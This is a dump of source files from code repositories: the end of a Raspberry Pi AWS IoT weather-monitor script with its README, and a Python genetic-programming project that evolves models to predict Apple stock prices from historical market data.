\nmyAWSIoTMQTTClient.subscribe(\"Home/WeatherRPI/Input1\", 1, customCallback)\nmyAWSIoTMQTTClient.subscribe(\"Home/WeatherRPI/Input2\", 1, customCallback)\n\ntime.sleep(2)\n\n# Publish to the output topic in a loop forever\nmyAWSIoTMQTTClient.publish(\"Home/WeatherRPI/Output\", \"Rapsberry Pi Weather Station is Ready!\", 0)\n\nmyevent = threading.Event()\nCurrentThread = threading.Thread(target=GetWeatherthreadProc, args=(myevent,))\nCurrentThread.start()\n\ntry:\n\twhile True:\n\t\ttime.sleep(2)\nexcept KeyboardInterrupt: # If CTRL+C is pressed, exit cleanly:\n myevent.set()\n\n\n" }, { "alpha_fraction": 0.7515528202056885, "alphanum_fraction": 0.7805383205413818, "avg_line_length": 29.1875, "blob_id": "2a8f3d6a223323adb314713334daa2c0aea4def1", "content_id": "0ed219043576220fba8e209e9b1d5507116ca32d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 483, "license_type": "no_license", "max_line_length": 108, "num_lines": 16, "path": "/README.md", "repo_name": "Chace0219/RPI-Teensy-Weather-Monitor", "src_encoding": "UTF-8", "text": "# RPI-Teensy-Weather-Monitor\nRPI &amp; Teensy 3.6 based Weather Monitor Device \n\n# Wiring\n![wiring diagram](https://github.com/Chace0219/RPI-Teensy-Weather-Monitor/blob/master/Wiring_Schematics.png)\n\n\n# Fucntinoalitiy List\n1) RPI Side\n- WUnderground Weather API Client using internet IP\n- AWS IOT client\n- UART CRC32 Master for Arduino ( weather info and position information)\n\n2) Arduino Side\n- wehather symbols using stepper motor, ws2812, small water pump\n- Serial slave from RPI\n" } ]
3
seepls/algorithmic-trading
https://github.com/seepls/algorithmic-trading
ad40c7cf5476f1c6b616a5826c83f9c9e401ee83
fec2731ba1c86bd1a88125c50ef8596135cf413a
82020a1f1bd9730489a3fd0d8cd6a452f26b30b8
refs/heads/master
2020-08-18T10:27:52.130206
2019-10-17T12:08:33
2019-10-17T12:08:33
215,779,451
1
0
null
2019-10-17T11:48:38
2019-10-16T14:14:48
2014-05-09T04:01:56
null
[ { "alpha_fraction": 0.6455142498016357, "alphanum_fraction": 0.6535375714302063, "avg_line_length": 22.220338821411133, "blob_id": "e6836890310cc2a3ae47672cc3ad7d42a41416d8", "content_id": "95f79ad5d57f17b220078cfe80cf01ba8d28e60d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1371, "license_type": "no_license", "max_line_length": 60, "num_lines": 59, "path": "/Rahul_Genetic_Program/analysis/extract_data.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Extracts Data from Trials\n#Rahul Ramakrishnan\n\nimport os\nfirst_dir = '/Users/rahulramakrishnan/Desktop/T_S_Trial_1'\n#second_dir = '/Users/rahulramakrishnan/Desktop/T_S_Trial_2'\n#third_dir = '/Users/rahulramakrishnan/Desktop/T_S_Trial_3'\n\nmean_files = []\nbest_files = []\n\nfor root, dirs, filenames in os.walk(first_dir):\n for f in filenames:\n\tmean_files.append(open(os.path.join(root, f), 'r'))\t\t\n\tbest_files.append(open(os.path.join(root, f), 'r'))\n\nmean_file = open('./mean.txt', 'w')\nbest_file = open('./best.txt', 'w')\n\ndef multiReadMean(f):\n\tmean_in_f = []\n\tfor line in f:\n\t\twords = line.split(' ')\n\t\tmean = words[0]\n\t\tmean_in_f.append(mean)\n\treturn mean_in_f\n\ndef multiReadBest(f):\n\tbest_in_f = []\n\tfor line in f:\n\t\twords = line.split(' ')\n\t\tbest = words[1]\n\t\tbest_in_f.append(best)\n\treturn best_in_f\n\n\nmeans = map(lambda f: multiReadMean(f), mean_files)\nbests = map(lambda f: multiReadBest(f), best_files)\n\n#means = [ [], [], [], [], [] ]\n\nmeans.pop(0)\nbests.pop(0)\n\nfinal_means = []\nfor i in range(0, len(means[0])):\n\tgeneration_means = map(lambda x: float(x[i]), means)\n\tfinal_means.append(min(generation_means))\n\nfinal_bests = []\nfor i in range(0, len(bests[0])):\n\tgeneration_bests = map(lambda x: float(x[i]), bests)\n\tfinal_bests.append(min(generation_bests))\n\nfor m in final_means:\n\tmean_file.write(str(m) +'\\n')\n\nfor b in final_bests:\n\tbest_file.write(str(b) +'\\n')\n\n" }, { "alpha_fraction": 0.6388722062110901, "alphanum_fraction": 0.6544691324234009, "avg_line_length": 19.567901611328125, "blob_id": "62b742b2800411ec445501197531bff7bea708b1", "content_id": "4cade1352bbb123379c210662a9069be1abed8b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 74, "num_lines": 81, "path": "/Rahul_Genetic_Program/README.md", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "Predicting Apple Stock\n======================\nEvolutionary Computing - Genetic Program\n========================================\n\n###Class: Stochastic Optimization\n###Professor: Jason Lohn\n###Author: Rahul Ramakrishnan\n\n**Description:**\nPredicts apple stock price using a genetic program. \nIt is trained using 2010-2013 apple and nasdaq data for\nnow, however, more data will be added soon.\n\n\n**Quick Start**\n\n*Step 1:*\nInstall python 2.7 interpretter\n\n```\nsudo apt-get install python2.7\n```\n\nInstall pip (pip installs python):\n\nhttp://pip.readthedocs.org/en/latest/installing.html\n\n\nOn Linux:\n```\nsudo apt-get install python-pip\n```\n\n\nInstall colors\n\n```\nsudo pip install termcolor\n```\n\n*Step 2:*\nEnsure that Rahul_Genetic_Program/ contains\n- a. predict.py\n- b. apple/ (package containing modules)\n\t- config.py\n\t- tree.py\n\t- initialize.py\n\t- scrape.py\n\t- inspect.py\n\t- recombination.py\n\t- selection.py\n\t- fitness.py\n- c. 
data/ (contains data)\n- d. output/ (statistical data outputted)\n- e. You can change default parameters in the config.py file\n\n*Step 3:*\nPoint apple/scrape.py\n\tnasdaq line: 42\n\tsp500 line: 72\n\tapple line: 95\n\tto the file data path, \n\ton your system\n\n*Step 4:*\n```\n$ python predict.py\n```\n\n*Step 5:*\nPopulations will be outputted to the screen\n\n\n**TO DO:**\n- Add more signals (S&P, apple tweets, etc.) \n- Fix early convergence from crossover ---------------------------DONE\n- Refactor all for loops into map/reduce/filter/scan -------------DONE\n- Add colors to output -------------------------------------------DONE\n- Add graphs of mean generational error and best fitness----------PROGRESS\n- Add best tree output along with average generational error -----DONE\n\n" }, { "alpha_fraction": 0.6114550828933716, "alphanum_fraction": 0.6424148678779602, "avg_line_length": 31.299999237060547, "blob_id": "3f6c3aa15f3b2f2096d59bd43a7257b7520bbc5f", "content_id": "004886116b5d5c5490a47aba977d35c36e3289ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 646, "license_type": "no_license", "max_line_length": 115, "num_lines": 20, "path": "/Rahul_Genetic_Program/data/test_data/test_data_convert.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#Stochastic Optimization\n\n#Test Data Convert\ndef getAppleData():\n\t#Same thing for nasdaq data as apple\n\tapple = open('../nasdaq.txt', 'r')\n\ttest_apple = open('./test_apple_data.txt', 'w')\t\n\tfor line in apple:\n\t\tinfo = line.split(',')\n\t\tapple_open = float(info[1])\n\t\tapple_low = float(info[2])\n\t\tapple_high = float(info[3])\n\t\tapple_volume = float(info[5])\n\t\tapple_close_price = apple_volume / 1000 - apple_open / 10 + apple_low - apple_high + 1000 \n\t\tprint apple_close_price\n\t\tnew_line = \"%s,%s,%s,%s,%s,%s,%s\" %(info[0], info[1], info[2], info[3], str(apple_close_price), info[5], info[6])\n\t\ttest_apple.write(new_line)\n\t\t\ngetAppleData()\n" }, { "alpha_fraction": 0.699090301990509, "alphanum_fraction": 0.7053883671760559, "avg_line_length": 26.980392456054688, "blob_id": "3cbd117351737ecb7a3b8afe1cdaa4dd43844f68", "content_id": "ffad80f9f2251d6511fa0f867145025712e3468a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 74, "num_lines": 51, "path": "/Genetic_algorithm_Tushar/predictor.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "from data.read_stock import DataHandler\nfrom ga.individual import Individual\nfrom ga.population import Population\nimport numpy as np\n\n\ndataHandler = DataHandler(['apple_test_data.csv', 'NASDAQ_test_data.csv'])\n#dataHandler = DataHandler(['apple_data.csv', 'NASDAQ_data.csv'])\ndata = dataHandler.get_signal_list()\nsignal_ranges = dataHandler.signal_ranges()\n#print signal_ranges\n\ndata_element = len(data[0])\n#print \"data[0]\"\n#print data[0]\n\n\npopulation = Population(100 , signal_ranges, data)\n#for i in population:\n# print i.transform_individual(signal_ranges)\ninitial_fitess_values = map(population.fitness_function, population) \n#print initial_fitess_values\n\n\nnumber_generations = 100\n\npopulation.sus_sampler(initial_fitess_values)\nmax_list = []\nmean_list = []\n\nfor i in xrange(number_generations):\n #print \"initial population\"\n #for i in population:\n # print i.rep\n #print \"before crossover\"\n 
population.crossover()\n #print \"after crossover\"\n #for i in population:\n # print i.rep\n #print \"before mutation\"\n population.mutation()\n #for i in population:\n # print i.rep\n #print \"after mutation\"\n fitness_vals = map(population.fitness_function, population)\n population.sus_sampler(fitness_vals)\n mean_val = np.mean(fitness_vals)\n max_val = max(fitness_vals)\n print str(mean_val) + \",\" + str(max_val)\n mean_list.append(mean_val)\n max_list.append(max_val)\n\n\n" }, { "alpha_fraction": 0.8275862336158752, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 56, "blob_id": "7f464e48148c7c30e9197e70adf059d162d56c88", "content_id": "b9ddc9edc5ea4109e7e95e737cadb19ba00fe137", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 56, "num_lines": 1, "path": "/Genetic_algorithm_Tushar/transform_data.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "# File contains functions to perform data transformation \n" }, { "alpha_fraction": 0.5877959728240967, "alphanum_fraction": 0.5955823659896851, "avg_line_length": 35.801170349121094, "blob_id": "254031c05f886822eb195cf4c83102ff4c5ac847", "content_id": "bc86004dee2d75d9b934a05806eb8154bae025a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6293, "license_type": "no_license", "max_line_length": 137, "num_lines": 171, "path": "/Genetic_algorithm_Tushar/data/read_stock.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "import csv\nfrom datetime import datetime\n\n\ndef read_csv_file(filename, objtype): \n \"\"\" Function takes a CSV file and a class definition as input\n and returns a list of that object type. It ignores the \n header line of the CSV file. 
The class constructor needs \n to handle how the list item is handled.\"\"\"\n\n obj_list = []\n\n with open(filename, 'rb') as f:\n reader = csv.reader(f)\n next(reader, None)\n\n for row in reader:\n objinstance = objtype(row)\n obj_list.append(objinstance)\n\n\n return obj_list\n\n\ndef percent_difference(value, orig):\n return (value - orig) / float(orig)\n\n\nclass AppleStockPrice:\n \"\"\" Class to hold the stock price\"\"\"\n def __init__(self,listing):\n self.date_ = datetime.strptime(listing[0], \"%Y-%m-%d\")\n self.open_ = float(listing[1])\n self.high_ = float(listing[2])\n self.low_ = float(listing[3])\n self.close_ = float(listing[4])\n self.volume_ = int(listing[5])\n self.adjclose_ = float(listing[6])\n\n\nclass NasdaqPrice:\n \"\"\" Class to hold the NASDAQ price\"\"\"\n def __init__(self,listing):\n self.date_ = datetime.strptime(listing[0], \"%Y-%m-%d\")\n self.open_ = float(listing[1])\n self.high_ = float(listing[2])\n self.low_ = float(listing[3])\n self.close_ = float(listing[4])\n self.volume_ = int(listing[5])\n self.adjclose_ = float(listing[6])\n\n\nclass FitnessDataObject:\n \"\"\" Data used to evaluate the fitness of the evolved model \"\"\"\n\n def __init__(self):\n self.data = {}\n\n def add_signal(self, name, value = 0.0):\n if type(name) is str and name not in self.data:\n self.data[name] = value\n else:\n print \"Signal name isn't a string\"\n\n def delete_signal(self, name):\n if type(name) is str and name in self.data:\n del self.data[name]\n else:\n print \"Signal name isn't a string or signal doesn't exist\"\n\n def get_signals(self):\n return self.data.keys()\n\n def add_signals(self, names):\n if names:\n for name in names:\n self.add_signal(name)\n\n def put_value(self, signal_name, value):\n self.data[signal_name] = value\n\n def get(self, signal_name):\n return self.data[signal_name]\n\n\nclass DataHandler:\n\n\n def get_dataset(self, file_class):\n apple_stock_prices = read_csv_file(file_class[0][0], file_class[0][1])\n nasdaq_stock_prices = read_csv_file(file_class[1][0], file_class[1][1])\n dataset = []\n\n\n for i in xrange(1, len(apple_stock_prices)):\n\n model = FitnessDataObject()\n open_diff = percent_difference(apple_stock_prices[i].open_, apple_stock_prices[i-1].open_)\n high_diff = percent_difference(apple_stock_prices[i].high_, apple_stock_prices[i-1].high_)\n low_diff = percent_difference(apple_stock_prices[i].low_, apple_stock_prices[i-1].low_)\n close_diff = percent_difference(apple_stock_prices[i].close_, apple_stock_prices[i-1].close_)\n volume_diff = percent_difference(apple_stock_prices[i].volume_, apple_stock_prices[i-1].volume_)\n adjclose_diff = percent_difference(apple_stock_prices[i].adjclose_, apple_stock_prices[i-1].adjclose_)\n #dates_ = apple_stock_prices[i].date_\n\n model.add_signal(\"delta_open\", open_diff)\n model.add_signal(\"delta_high\", high_diff)\n model.add_signal(\"delta_low\", low_diff)\n model.add_signal(\"delta_close\", close_diff)\n model.add_signal(\"delta_volume\", volume_diff)\n model.add_signal(\"delta_adjclose\", adjclose_diff)\n # model.add_signal(\"date\", dates_)\n dataset.append(model)\n \n for i in xrange(1, len(nasdaq_stock_prices)):\n \n model = FitnessDataObject()\n open_diff = percent_difference(nasdaq_stock_prices[i].open_, nasdaq_stock_prices[i-1].open_)\n high_diff = percent_difference(nasdaq_stock_prices[i].high_, nasdaq_stock_prices[i-1].high_)\n low_diff = percent_difference(nasdaq_stock_prices[i].low_, nasdaq_stock_prices[i-1].low_)\n close_diff = 
percent_difference(nasdaq_stock_prices[i].close_, nasdaq_stock_prices[i-1].close_)\n volume_diff = percent_difference(nasdaq_stock_prices[i].volume_, nasdaq_stock_prices[i-1].volume_)\n adjclose_diff = percent_difference(nasdaq_stock_prices[i].adjclose_, nasdaq_stock_prices[i-1].adjclose_)\n\n #print nasdaq_stock_prices[i].volume_\n #print nasdaq_stock_prices[i-1].volume_\n #print (nasdaq_stock_prices[i].volume_ - nasdaq_stock_prices[i-1].volume_) / float(nasdaq_stock_prices[i -1].volume_)\n\n\n\n #volume_diff = 100 *(nasdaq_stock_prices[i].volume_ - nasdaq_stock_prices[i-1].volume_) / nasdaq_stock_prices[i - 1].volume_\n #print volume_diff\n #dates_ = nasdaq_stock_prices[i].date_\n\n\n model.add_signal(\"delta_nasdaq_open\", open_diff)\n model.add_signal(\"delta_nasdaq_high\", high_diff)\n model.add_signal(\"delta_nasdaq_low\", low_diff)\n model.add_signal(\"delta_nasdaq_close\", close_diff)\n model.add_signal(\"delta_nasdaq_volume\", volume_diff)\n model.add_signal(\"delta_nasdaq_adjclose\", adjclose_diff)\n dataset.append(model)\n\n return dataset\n\n def __init__(self, files):\n file_class = [(files[0] , AppleStockPrice), (files[1] , NasdaqPrice)]\n self.dataset = self.get_dataset(file_class)\n\n\n def signal_ranges(self):\n signal_ranges = []\n if self.dataset != None:\n for signal in self.dataset[0].get_signals():\n l = map(lambda x:x.get(signal), self.dataset)\n min_max = (min(l), max(l))\n signal_ranges.append(min_max)\n else:\n print \"Dataset is None\"\n return signal_ranges\n\n\n def get_signal_list(self):\n signal_data = []\n for i in xrange(len(self.dataset)):\n vals = []\n for signal in self.dataset[i].get_signals():\n val = self.dataset[i].get(signal)\n vals.append(val)\n signal_data.append(vals)\n return signal_data\n" }, { "alpha_fraction": 0.5866666436195374, "alphanum_fraction": 0.5885714292526245, "avg_line_length": 18.407407760620117, "blob_id": "fe542b6331cfc91e5ca49ba7747fdd087cdb7966", "content_id": "9b2c3d340b7092fd17e24370f733cd6667f8e048", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 525, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/Rahul_Genetic_Program/apple/tree.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: tree\n\n'''\n\tNode and Tree Class\n'''\n\n#Genetic Node Class\nclass Node(object):\n #Constructor for Node object\n def __init__(self, value=None):\n self.value = value\n self.left = None\n self.right = None \n\n\n#Genetic Tree Class\n#Uses Genetic Node \nclass Tree(object):\t\n\t#Constructor\n\tdef __init__(self):\n\t\t#Initializes root node\n\t\t#Will be overwritten\n\t\tself.root = Node('root') \n\t\tself.size = 1\n\t\tself.decision = ['left', 'right']\n\t\tself.fitness = None\n\n" }, { "alpha_fraction": 0.6542646288871765, "alphanum_fraction": 0.6654966473579407, "avg_line_length": 34.599998474121094, "blob_id": "8dbef7b8a0bc91fc28083b49aa60e6b87b086fdc", "content_id": "e38605eae32e3c3920d4bff349cd03ee56c3d301", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2849, "license_type": "no_license", "max_line_length": 112, "num_lines": 80, "path": "/Rahul_Genetic_Program/apple/fitness.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: fitness\n\n'''\n\tFitness \n\tFunctions & Wrappers\n'''\n\nimport scrape\nimport recombination\nfrom copy import deepcopy\n\ndef 
generateFitnesses(population):\t\t\n\tfitnesses = map(lambda x: fitnessValue(x), population)\t\n\n#Calculate the fitness value of a single GP tree\n#and stores it in the tree object\ndef fitnessValue(tree):\n path = [] \n recombination.loadPaths(tree.root, path)\n\n\t#Load market data and stores in respective dictionaries\t\n\tapple_data = scrape.getAppleData()\t\n\tnasdaq_data = scrape.getNasdaqData()\n\tsp500_data = scrape.getSP500Data()\n\t\n\tnodeReplace(path)\t\n\tequation = createEquation(path)\t\n\tdata_size = range(0, len(apple_data))\t\n\tpredicted_prices = map(lambda i: evaluateEquation(i, nasdaq_data, apple_data, sp500_data, equation), data_size)\n\tnext_day_prices = map(lambda data: data['apple_close'], apple_data) #next_day_price is the actual price\n\t\t\n\tpredicted_prices.pop() \t#Removes the last item in the list\n\tnext_day_prices.pop(0) \t#Removes the first item in the list\t\t\n\t\n\tzipped = zip(predicted_prices, next_day_prices)\n\terrors = map(lambda pair: abs(pair[1] - pair[0]), zipped)\n\tfitness = sum(errors)/float(len(errors))\n\n\ttree.fitness = fitness\t#Adds fitness to tree object in-place\t\n\treturn fitness \t\t#For printEquationPopulation function\t\n\ndef evaluateEquation(i, nasdaq_data, apple_data, sp500_data, equation):\n\treturn eval(equation)\n\t\n\n#Replaces path with data by subbing in\n#dictionary that will be eval'd later\ndef nodeReplace(path):\n terminals = scrape.getTerminal() \n\n string_terminals = filter(lambda t: type(t) == type('str'), terminals)\n path_string_terminals = filter(lambda t: t in path, string_terminals) \n\n apple_data = filter(lambda t: t[0] == 'a', path_string_terminals)\n nasdaq_data = filter(lambda t: t[0] == 'n', path_string_terminals)\n\tsp500_data = filter(lambda t: t[0] == 's', path_string_terminals)\n\n map(lambda t: replaceWrapper(path, t, 'a'), apple_data)\n map(lambda t: replaceWrapper(path, t, 'n'), nasdaq_data)\n\tmap(lambda t: replaceWrapper(path, t, 's'), sp500_data)\n\ndef replaceWrapper(path, t, data_type):\n pairs = filter(lambda pair: pair[1] == t, enumerate(path))\n indices = map(lambda pair: pair[0], pairs) \n map(lambda index: replaceWrapper2(path, t, data_type, index), indices)\n\ndef replaceWrapper2(path, t, data_type, index):\n if(data_type == 'a'):\n path[index] = \"apple_data[i]['%s']\" %(t)\n elif(data_type == 'n'):\n path[index] = \"nasdaq_data[i]['%s']\" %(t)\n\telif(data_type == 's'):\n\t\tpath[index] = \"sp500_data[i]['%s']\" %(t)\n\n#Creates the equation that the tree represents\ndef createEquation(path):\n paths = map(lambda node: str(node), path)\n final_path = reduce(lambda x,y: x + \" \" + y, paths)\n return final_path\n\n" }, { "alpha_fraction": 0.685512363910675, "alphanum_fraction": 0.6893993020057678, "avg_line_length": 28.789474487304688, "blob_id": "20bbcb5df87260bb62658a951ea7b87ccd50703e", "content_id": "d8477965714b6769637dbc6bb18685dd6bc79869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2830, "license_type": "no_license", "max_line_length": 82, "num_lines": 95, "path": "/Rahul_Genetic_Program/apple/initialize.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: initialize\n\nimport config\nfrom tree import Node\nfrom tree import Tree\nimport scrape \n\nfrom random import choice\nfrom random import sample\nfrom copy import deepcopy\n\n'''\n\tInitialization \n\tFunctions and Wrappers\n'''\n#Initialize genetic tree population\ndef 
initPopulation(num_of_trees):\n\ttree_size = config.tree_size\t\n\t#tree = initGeneticTree(6)\n\t#population = map(lambda i: sameTree(tree), range(0, num_of_trees))\t\t\n\tpopulation = map(lambda tree: initGeneticTree(tree_size), range(0, num_of_trees))\n\treturn population\n\ndef sameTree(tree):\n\treturn deepcopy(tree)\t\n\n#Initializes a genetic tree with \n#the specified number of nodes\ndef initGeneticTree(num_of_nodes):\t\n\ttree = Tree()\n\tdecision = ['left', 'right']\n\tmap(lambda x: createRandomNodes(tree.root, decision), range(0, num_of_nodes))\t\n\tfillGeneticTree(tree.root)\n\treturn tree \n\n#Traverse the binary tree and adds a pair \n#of left and right nodes in a random place\ndef createRandomNodes(root, decision):\n chosen = choice(decision)\n if(chosen == 'left' and root.left == None):\n root.left = Node('l')\n\t\troot.right = Node('r')\n elif(chosen == 'right' and root.right == None):\n root.right = Node('r')\n\t\troot.left = Node('l')\n else:\n if(chosen == 'left'):\n createRandomNodes(root.left, decision)\n else: #chosen = 'right'\n createRandomNodes(root.right, decision)\n\n\n#Insert terminal and functional nodes into the\n#genetic tree. \ndef fillGeneticTree(root):\n\t#Load terminal list with terminal nodes\n\tterminal = scrape.getTerminal()\n\t#Load functional list with functional nodes\n\tfunctional = scrape.getFunctional()\t\t\n\t#Keeps track of functional and terminal list positions\t\n\tterminal_index = 0\n\tfunctional_index = 0\n\tstack = []\n\tstack.append(root)\n\ttemp_terminal = sample(terminal, len(terminal)) #shuffle terminal\n\ttemp_functional = sample(functional,len(functional)) #shuffle functional\n\n\t#While loop ensures that initial population has\n\t#one of each type of functional node\n\t#and one of each type of terminal node\t\n\twhile(len(stack) > 0):\t\t\n\t\tcurrent = stack.pop()\t\n\n\t\tif(current.left == None and current.right == None):\n\t\t\t#Node is a leaf, insert terminal node\n\t\t\tcurrent.value = temp_terminal[terminal_index]\n\t\t\tterminal_index += 1\n\t\telse: #Node is not a leaf, insert a functional node\n\t\t\tcurrent.value = temp_functional[functional_index]\n\t\t\tfunctional_index += 1\n\n\t\t#Resets indices if out of bounds\n\t\tif terminal_index == len(temp_terminal):\n\t\t\tterminal_index = 0 \n\t\tif functional_index == len(temp_functional):\n\t\t\tfunctional_index = 0\n\t\t\n\t\ttemp_node = current.right\t\t\n\t\tif temp_node != None:\n\t\t\tstack.append(temp_node) #stack.push\n\n\t\ttemp_node = current.left\n\t\tif temp_node != None:\n\t\t\tstack.append(temp_node) #stack.push\n" }, { "alpha_fraction": 0.8302354216575623, "alphanum_fraction": 0.832713782787323, "avg_line_length": 31.200000762939453, "blob_id": "70beb514ab75cad7827e31a766dccc028688450b", "content_id": "20a9d3fe3d5561ea310a9e45c319fd54308cce3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "no_license", "max_line_length": 64, "num_lines": 25, "path": "/Rahul_Genetic_Program/predict.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#Main Apple Stock Predicting Script\n\nfrom apple import config\nfrom apple import initialize\nfrom apple import inspect\nfrom apple import recombination\nfrom apple import selection\nfrom apple import fitness\n\nfrom termcolor import colored\n\npopulation = initialize.initPopulation(config.population_size)\n\nfor generation in xrange(0, 
config.generations):\t\t\t\n\tfitness.generateFitnesses(population)\n\tinspect.printEquationPopulation(population, generation)\n\tfor tree in xrange(0, len(population)):\t\t\t\n\t\trecombination.performMutation(population)\n\t\trecombination.performCrossover(population)\n\t#Tournament Selection\n\tselection.tournamentParentSelection(population)\n\t#Roullette Wheel\n\t#roulletteWheel = selection.createRoulletteWheel(population)\n\t#selection.roulletteParentSelection(roulletteWheel, population)\n\n\n" }, { "alpha_fraction": 0.6515709161758423, "alphanum_fraction": 0.6722332239151001, "avg_line_length": 26.379844665527344, "blob_id": "46376daa5f17ea0a42fb9a8e12db8fd242b5624d", "content_id": "5ef5bea7e76159b7edb8e55f70666c57bd450cb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3533, "license_type": "no_license", "max_line_length": 91, "num_lines": 129, "path": "/Rahul_Genetic_Program/apple/recombination.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: recombination \n\n'''\n\tMutation & Crossover\n\tFunctions and Wrappers \n'''\nimport config\nfrom random import choice\nfrom random import random\nfrom random import randint\nfrom copy import deepcopy\n\n'''\n\tMutation\n'''\ndef performMutation(population):\t\n\tfor tree in xrange(0, len(population)):\n\t\tdice_roll = random()\n\t\tif (dice_roll < config.m_probability):\n\t\t\tmutate(population[tree].root)\t\n\ndef mutate(root):\n\t#Choose to swap terminal or functional nodes\n\tnode_type = choice(['terminal', 'functional'])\n\tif(node_type == 'terminal'): \n\t\tt_node_values = getNodes(root,1)\n\t\tv_1 = choice(t_node_values)\n\t\tt_node_values.remove(v_1) #remove from pool\n\t\tv_2 = choice(t_node_values)\n\t\tnode_1 = DFS(root, v_1) #Retrieve node references\n\t\tnode_2 = DFS(root, v_2)\t\n\t\tswapValues(node_1, node_2)\n\telse: #type == 'functional'\n\t\tf_node_values = getNodes(root,2)\n\t\t#Safeguards against a one element f_node\n\t\tif (len(f_node_values) > 1):\n\t\t\tv_1 = choice(f_node_values)\t\n\t\t\tf_node_values.remove(v_1) #remove from pool\n\t\t\tv_2 = choice(f_node_values)\n\t\t\tnode_1 = DFS(root, v_1) #Retrieve node references\n\t\t\tnode_2 = DFS(root, v_2)\n\t\t\tswapValues(node_1, node_2)\t\t\t\t\n\n\n'''\n\tCrossover\n'''\ndef performCrossover(population):\n\tsize = len(population)\n\tfor i in xrange(0, size):\n\t\tif(random() <= config.c_probability and (i+1) < size):\n\t\t\tcrossover(population[i].root, population[i+1].root)\n\t\t\t#For random selection\n\t\t\t#choice_1 = randint(0, size-1)\t\n\t\t\t#choice_2 = randint(0, size-1)\n\t\t\t#if(choice_1 != choice_2):\n\t\t\t#\tcrossover(population[choice_1].root, population[choice_2].root)\t\t\n\n\ndef crossover(root_1, root_2):\n\tnode_1 = chooseRandomSubTree(root_1, 3)\n\tnode_2 = chooseRandomSubTree(root_2, 3)\n swapValues(node_1, node_2) #Swap subtrees\n swapNodes(node_1, node_2)\n\n\n'''\n\tWrappers\n'''\ndef chooseRandomSubTree(root, t_or_f):\t\t\n\tfunctional_nodes = getNodes(root, 3)\t\n\t#Choose from sub-trees that have a depth greater than 2\n\t#This prevents pre-mature convergence\n\tqualified_nodes = filter(lambda node: depth(node) > config.minimum_size, functional_nodes)\n\tnode = choice(qualified_nodes)\t\n\treturn node\n\t\ndef getNodes(root, t_or_f=0):\t\n\tnodes = []\n\tloadPaths(root, nodes, t_or_f)\n\treturn nodes\n\ndef swapValues(node_1, node_2):\n\ttemp_value = node_1.value\n\tnode_1.value = node_2.value\n\tnode_2.value = 
temp_value\n\ndef swapNodes(node_1, node_2):\n\ttemp_left = node_1.left\n\ttemp_right = node_1.right\n\tnode_1.left = node_2.left\n\tnode_1.right = node_2.right\n\tnode_2.left = temp_left\n\tnode_2.right = temp_right\n\n#Loads path with an in-order traversal\t\n#all, terminal, or functional nodes\ndef loadPaths(root, path=[], t_or_f=0):\t\n\tif root == None:\n\t\treturn\n\tloadPaths(root.left, path, t_or_f)\n\tif(t_or_f == 2): #Only append functional nodes\n\t\tif(root.left != None and root.right != None):\n\t\t\tpath.append(root.value)\t\n\telif(t_or_f == 1): #Only append terminal Nodes\n\t\tif(root.left == None and root.right == None):\n\t\t\tpath.append(root.value)\n\telif(t_or_f == 3): #Only append functional node REFERENCES\n\t\tif(root.left != None and root.right != None):\n\t\t\tpath.append(root)\n\telse: # t_or_f == 0, append all nodes\n\t\tpath.append(root.value)\n\tloadPaths(root.right, path, t_or_f)\n\n#Depth First Search\ndef DFS(root, target_value):\n if(root == None):\n return \n if root.value == target_value:\n return root\n return DFS(root.left, target_value) or DFS(root.right, target_value)\n\n#Depth of a Tree\ndef depth(root):\n\tif(root == None):\n\t\treturn 0\n\telse:\n\t\treturn 1 + max(depth(root.left), depth(root.right))\n\n" }, { "alpha_fraction": 0.671023964881897, "alphanum_fraction": 0.6971677541732788, "avg_line_length": 29.600000381469727, "blob_id": "61905dddd0ef823e2fee13f13b76664dc1647c81", "content_id": "c7003693a6de438b3e25c0acf870d1c7bb763aa5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 459, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/Rahul_Genetic_Program/apple/config.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: config\n\npopulation_size = 50 #Number of trees in the population\ntournament_size = 3 #Size of tournament during tournament selection\n\ntree_size = 10 #Number of nodes in a tree\ngenerations = 50 #Number of generations\n\nc_probability = .7 #Crossover probability\nm_probability = .2 #Mutation 